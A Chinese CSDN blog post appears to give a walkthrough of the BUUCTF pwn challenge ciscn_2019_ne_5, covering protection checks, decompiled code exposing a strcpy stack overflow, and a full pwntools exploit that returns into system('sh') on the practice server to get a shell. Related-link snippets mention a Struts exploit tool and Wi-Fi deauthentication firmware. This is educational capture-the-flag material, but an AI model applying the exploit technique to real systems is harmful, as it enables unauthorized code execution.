pwn刷题num37---栈溢出 + strcpy函数溢出

最新推荐文章于 2023-09-21 09:07:28 发布
最新推荐文章于 2023-09-21 09:07:28 发布
阅读量785 收藏
点赞数
分类专栏: CTF BUUCTF pwn 文章标签: 系统安全 安全 python 网络安全 c语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/tbsqigongzi/article/details/124505416
版权
pwn 同时被 3 个专栏收录
67 篇文章 5 订阅
订阅专栏
CTF
61 篇文章 1 订阅
订阅专栏
BUUCTF
36 篇文章 0 订阅
订阅专栏

BUUCTF-PWN-ciscn_2019_ne_5

在这里插入图片描述
首先查保护–>看链接类型–>赋予程序可执行权限–>试运行在这里插入图片描述

32位程序,小端序
开启部分RELRO-----got表可写
未开启canary保护-----存在栈溢出
开启NX保护-----堆栈不可执行
未开启PIE-----程序地址为真实地址
动态链接

程序运行后让我们输入密码,
ida一下看一下主函数
在这里插入图片描述
看来要想进行下面的操作,必须输入password:administrator
if ( strcmp(s1, “administrator”) )
{
puts(“Password Error!”);
exit(0);
}
在这里插入图片描述

之后我们可以看到这是一个菜单栏,可以添加一个log,展示所有log,打印所以log以及最后的退出程序

 case 4:
        GetFlag(src);
        break;

发现一个flag相关的函数,需要选4
在这里插入图片描述
哎,不行
看一下其他函数吧,看一下AddLog((int)src);
在这里插入图片描述
scanf,可以对a1输入任意长的字符串,会造成栈溢出
再查看一下GetFlag(src);
在这里插入图片描述

strcpy(dest, src);

这里的strcpy函数会把src赋值给dest,而sec就是我们在AddLog((int)src);函数里输入的a1,
看一下栈区
在这里插入图片描述
在这里插入图片描述
dest距离返回地址0x4c(0x48+0x4)字节

思路

先用密码administrator进入菜单栏,再输入1,增加一个log,输入0x4c字节,再把返回地址设为system函数地址
在这里插入图片描述
把system参数设为sh(/bin/sh找不到)
在这里插入图片描述
exp

from pwn import *
context(os = 'linux',endian = 'little',log_level = 'debug',arch = 'i386')
sh = remote('node4.buuoj.cn',26659)
sh_addr = 0x080482ea 
sh.sendlineafter(b'Please input admin password:',b'administrator') 
sh.sendlineafter(b'0.Exit\n:',b'1')
system_addr = 0x080484D0
payload = flat([b'a' * (0x48 + 0x4),system_addr,b'b' * 4,sh_addr])
sh.sendlineafter(b'info:',payload)
sh.recvuntil('0.Exit\n:')
sh.sendline('4')
sh.interactive()

运行获得shell
在这里插入图片描述
在这里插入图片描述

tbsqigongzi
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【深入浅出】分析strcpy导致栈溢出的具体原因
weixin_36711901的博客
03-29 1814
(a)IDA看到的伪代码 (b)c语言的代码 可以看到在当前函数中,所有局部变量都存储在栈内, 当前函数ebp=0018FAEC, v4(即authenticated)位于ebp...
strcpy(d,s)的溢出问题
seekcreation的专栏
10-10 806
//2014-10-10    //strcpy溢出问题  //函数形参和局部变量是保存在栈中的,而栈是从高地址向低地址扩展的。 #include #include main() { //char s[]="123456789",d[]="123"; // char d[]="123", s[]="123456789"; // char d[]="123"; char
栈溢出strcpy()造成的缓冲区溢出
anddy926的专栏
12-28 4251
代码: #include  #include  void fun(const char* input) {        char buf[8];        printf("My stack look like:\n%p\n%p\n%p\n%p\n%p\n%p\n%p\n\n");        strcpy(buf,input);        printf("%s\n",b
strcpy溢出的攻击示例
lonelyrains的专栏
09-02 4650
在学习c/c++的时候,就讲到了一些C类型的字符串函数不是安全的,比如strcpy没有检查长度会溢出,推荐使用strncpy,笔试面试也经常问到。同时经常浏览安全相关的新闻,缓冲区溢出攻击是很常见的一种。那缓冲区溢出为什么可以攻击。今天通过strcpy进行简单的演示。         如下是guess_pwd.cpp代码 #include #include #include
strcpy的字符串溢出真的很可怕
liuxunfei15的博客
04-20 1854
如图: 按代码逻辑,程序员的想法是校验传入的str字符串密码,是不是"123",如果是的话就打印“Checkpasswordsucceed!”, 反之则打印“Checkpasswordfailed!”。所以当一个人不知道字符串密码的时候,它任意传入一串字符串,就如图中的 ,好家伙,一眼看过去,按代码逻辑来,你是不是觉得校验失败了,然后打印“Checkpasswordfailed!”? 然而,最终的结果却是:校验成功了“Checkpasswordsucceed!” 等你再回头...
strcat、strncat、strcmpstrcpy哪些函数会导致内存溢出?如何改进?
qq_57734712的博客
09-21 892
strcpy拷贝函数安全,他不做任何的检查措施,也不判断拷贝大小,不判断目的地址内存是否够用。,若str1=str2,则返回零;若str1<str2,则返回负数;若str1>str2,则返回正数。,它与strcpy的区别就是memcpy可以拷贝任意类型的数据,strcpy只能拷贝字符串类型。memcpy 函数用于把资源内存(src所指向的内存区域)拷贝到目标内存(dest所指向的内。strncpy拷贝函数,虽然计算了复制的大小,但是也不安全strcmp(str1,str2),是比较函数
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
struts-pwn:Apache Struts CVE-2017-5638的漏洞利用
05-18
python struts-pwn.py --list 'urls.txt' -c 'id' 检查针对单个URL的漏洞是否存在。 python struts-pwn.py --check --url 'http://example.com/struts2-showcase/index.action' 根据URL列表检查漏洞是否存在。 ...
Bugku S3 AWD排位赛-9 pwn二进制
08-27
Bugku S3 AWD排位赛-9 pwn二进制
Linux pwn入门教程(1)——栈溢出基础-0x01.rar
06-10
Linux pwn入门教程(1)——栈溢出基础
栈溢出基本原理的简单讲解
热门推荐
yan_star的博客
03-31 3万+
栈溢出基本原理的简单讲解 (新手上路,大牛还请自行跳过,不足之处,欢迎批评指正) 一 、预备知识: 缓冲区溢出简单介绍 缓冲区溢出:简单的说,缓冲区溢出就是超长的数据向小缓冲区复制,导致数据超出了小缓冲区,导致缓冲区其他的数据遭到破坏,这就是缓冲区溢出。而栈溢出是缓冲区溢出的一种,也是最常见的。只不过栈溢出发生在栈,堆溢出发生在堆,其实都是一样的。 栈的简单介绍 栈:栈是一种计算机系...
CTF-浅尝64位栈溢出PWN
BadRer的博客
06-04 1万+
干了一早上终于把这道’难题’做出来了,实在是不容易。头一次完完全全的做出64位的pwn题,如果就栈溢出来说的话,其实感觉和32位的也差不多。至少这方面没有遇到太大的困难,做64位的题对汇编指令的要求就更高了。正好一边做题,一边多学点汇编。 收获是很大的。正文刚开始被一个逻辑漏洞cmp给卡着,一直没有跳到真正产生漏洞的地方,好不容易跳过去了,结果被我自己坑了(写脚本的时候,没有考虑缓冲区的影响,经常
strcmp和strncasecmp需要担心比较溢出的问题吗?
03-10 734
请看一段有冗余的代码: ... int ifBQ = 0; while (*src != 0) { if (*(src+1) == '\0') // 冗余部分 break; if (strncasecmp(*content, "B?", 2) == 0) { ifBQ = 1; break; } if (strncasecmp(*content, "Q...
pwnable part1 溢出研究
isinstance的博客
12-27 729
这里有个视频是讲过程的,但是都是英文。。。 part1pwnable第一题的题目是这样的Mommy! what is a file descriptor in Linux?* try to play the wargame your self but if you are ABSOLUTE beginner, follow this tutorial link: https://www.youtu
strcpy内存溢出分析以及安全函数使用
qq_43538607的博客
08-01 325
【代码】strcpy内存溢出分析。
学校的简单入门题PWN
EternalBurning的博客
11-09 541
学校的简单入门题PWN0x00 first try0x01 easy_second_try0x02 printf 0x00 first try exeinfo打开看一下,是32位的 看看有没有程序保护,估计是入门题的缘故都没有程序保护: 用32位的ida打开, 要想拿到shell,就得让v6==99,而第11行的read()明显存在栈溢出,双击变量进入函数的栈界面 容易发现,s字符串的长度...
strncpy strcpy memcpy strnprintf strlen等字符串函数的用法和区别
移步换景的博客
09-27 421
C 标准库 - <string.h> char *strcpy(char *dest, const char *src) 把 src 所指向的字符串复制到 dest。如果目标数组 dest 不够大,而源字符串的长度又太长,可能会造成缓冲溢出的情况。该函数返回一个指向最终的目标字符串 dest 的指针. char *strncpy(char *dest, const char *src, size_t n) 把 src 所指向的字符串复制到 dest,最多复制 n 个字符。当 src 的长度小于
攻防世界PWN-string
Deeeelete的博客
11-15 566
题目:string 进PE或者checksec 64位程序 堆栈不可执行以及栈保护 运行一遍好像是一个文字游戏 剧情游戏?分析一波主要任务分支: 情况1:开始游戏,啥也不输入,60秒之后程序自动关闭 情况2:开始游戏,输入名称,名称超过了12个字符,直接出局 情况3:开始游戏,输入小于12个字符的名称,进入剧情问我走east还是up,如果选择up程序会一直死循环 情况4:开始游戏,输入小于12个字符的名称,进入剧情走east,然后问我选择1还是0,选择0,原地暴毙 情况5:开始游
pwn+栈溢出解题思路
最新发布
11-10
pwn是一种利用栈溢出漏洞的攻击方式,通常用于CTF比赛中。下面是一些pwn解题思路的步骤: 1. 找到漏洞:首先需要找到程序中的漏洞,通常是栈溢出漏洞或格式化字符串漏洞。 2. 利用漏洞:利用漏洞来执行恶意代码,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值